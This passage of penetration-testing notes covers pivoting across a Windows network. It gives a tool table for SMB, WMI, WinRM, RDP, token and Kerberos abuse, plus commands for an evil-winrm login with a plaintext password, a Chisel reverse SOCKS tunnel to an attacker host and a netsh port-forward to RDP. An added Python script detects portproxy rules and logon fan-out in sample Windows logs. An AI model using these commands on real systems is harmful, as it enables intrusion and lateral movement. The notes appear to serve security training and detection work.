7. Pivoting to Other Machines on the Network

Goal: Move laterally across systems to access additional machines, credentials, or data.


Objectives


Mermaid Diagram

```mermaid
graph TD
    A[Access on Initial Host] --> B[Identify Reachable Hosts]
    B --> C[Find Valid Creds or Tokens]
    C --> D[Use SMB, WMI, WinRM, RDP for Pivot]
    D --> E[Execute Commands or Deploy Tools]
    E --> F[Enumerate New Machine for Privilege or DA Path]
```

Techniques and Tools

| Technique | Tool/Command | Notes |
|---|---|---|
| Host Discovery | fping, nmap, PowerShell Test-Connection | Identify live hosts on subnets |
| Session Detection | quser, Get-NetSession, Invoke-UserHunter (PowerView) | Look for where users are logged in |
| SMB Pivot | wmiexec.py, psexec.py, crackmapexec | Leverage creds to execute commands over SMB |
| WMI Pivot | wmiexec.py, Invoke-WmiMethod | Remote command execution via WMI |
| WinRM Pivot | evil-winrm, Enter-PSSession | Preferred for stealthy and PowerShell-based access |
| RDP Pivot | xfreerdp, mstsc | Full interactive access if RDP is enabled |
| Reverse Proxy (SOCKS) | Chisel, SSH -D, proxychains, meterpreter socks4a | Create pivot tunnels for scanning or shell access |
| Port Proxy | netsh interface portproxy | Forward ports via compromised system |
| Token Impersonation | mimikatz, Incognito, Rubeus | Use available tokens from other logged-in users |
| TGT/TGS Delegation Abuse | Rubeus, kerberos::ptt, unconstrained delegation | Move using ticket-based attacks |

Example: Pivot via Evil-WinRM

```shell
evil-winrm -i 172.16.7.50 -u svc_sql -p lucky7
```

Example: Chisel SOCKS Reverse Proxy

```shell
# On attacker (server)
./chisel server -p 8080 --reverse

# On target (client)
chisel.exe client <attacker_ip>:8080 R:socks
```

Then configure /etc/proxychains.conf with:

```
socks5 127.0.0.1 1080
```

Example: Port Forwarding with netsh

```shell
netsh interface portproxy add v4tov4 listenport=1515 listenaddress=10.10.10.10 connectport=3389 connectaddress=172.16.6.50
```
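Seen from the blue team side, the techniques in the table above leave two recognisable traces in Windows Security logs: a `netsh interface portproxy add` command line in a process-creation event, and one account producing network logons to many hosts within a short window (credential reuse over SMB/WMI/WinRM). The following Python is an added example, not part of the original notes; the event records are constructed and their field names (`id`, `user`, `host`, `logon_type`, `cmdline`, `ts`) are a simplification assumed for illustration, not a real log schema.

```python
"""Two detections for the pivoting traces described above, run over constructed
Windows log records. Records are simplified dicts modelled on Security event 4624
(logon) and 4688 (process creation); the field names are an assumption."""
from collections import defaultdict
import re
import shlex

# Constructed sample events: one account fanning out over the network
# (svc_sql -> four hosts in 90 s) and one netsh portproxy rule being added.
SAMPLE_EVENTS = [
    {"id": 4624, "user": "svc_sql", "host": "SQL01", "logon_type": 3, "ts": 100},
    {"id": 4624, "user": "svc_sql", "host": "FS01", "logon_type": 3, "ts": 130},
    {"id": 4624, "user": "svc_sql", "host": "WEB02", "logon_type": 3, "ts": 160},
    {"id": 4624, "user": "svc_sql", "host": "DC01", "logon_type": 3, "ts": 190},
    {"id": 4624, "user": "jdoe", "host": "WS17", "logon_type": 2, "ts": 200},
    {"id": 4688, "user": "jdoe", "host": "WS17", "ts": 210, "cmdline":
     "netsh interface portproxy add v4tov4 listenport=1515 "
     "listenaddress=10.10.10.10 connectport=3389 connectaddress=172.16.6.50"},
    {"id": 4688, "user": "jdoe", "host": "WS17", "ts": 220,
     "cmdline": "netsh advfirewall show allprofiles"},
]

PORTPROXY_RE = re.compile(r"\bnetsh\b.*\binterface\b.*\bportproxy\b.*\badd\b", re.I)

def find_portproxy_commands(events):
    """Process-creation events whose command line adds a netsh portproxy rule."""
    return [e for e in events if e["id"] == 4688 and PORTPROXY_RE.search(e["cmdline"])]

def parse_portproxy(cmdline):
    """Pull the listen and connect endpoints out of a portproxy add command line."""
    kv = dict(tok.split("=", 1) for tok in shlex.split(cmdline) if "=" in tok)
    return {"listen": f"{kv.get('listenaddress', '*')}:{kv['listenport']}",
            "connect": f"{kv['connectaddress']}:{kv['connectport']}"}

def find_fanout_logons(events, min_hosts=3, window=120):
    """Accounts with network logons (type 3) to >= min_hosts distinct hosts inside
    `window` seconds: the footprint of credential reuse over SMB/WMI/WinRM."""
    by_user = defaultdict(list)
    for e in events:
        if e["id"] == 4624 and e["logon_type"] == 3:
            by_user[e["user"]].append((e["ts"], e["host"]))
    alerts = {}
    for user, logons in by_user.items():
        logons.sort()
        for i, (t0, _) in enumerate(logons):  # slide the window over each start time
            hosts = {h for t, h in logons[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                alerts[user] = sorted(hosts)
                break
    return alerts
```

On the sample data the fan-out check flags `svc_sql` across all four hosts, and the portproxy check surfaces the single rule creation with its `10.10.10.10:1515 -> 172.16.6.50:3389` mapping while ignoring the benign `netsh advfirewall` invocation.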

Pro Tips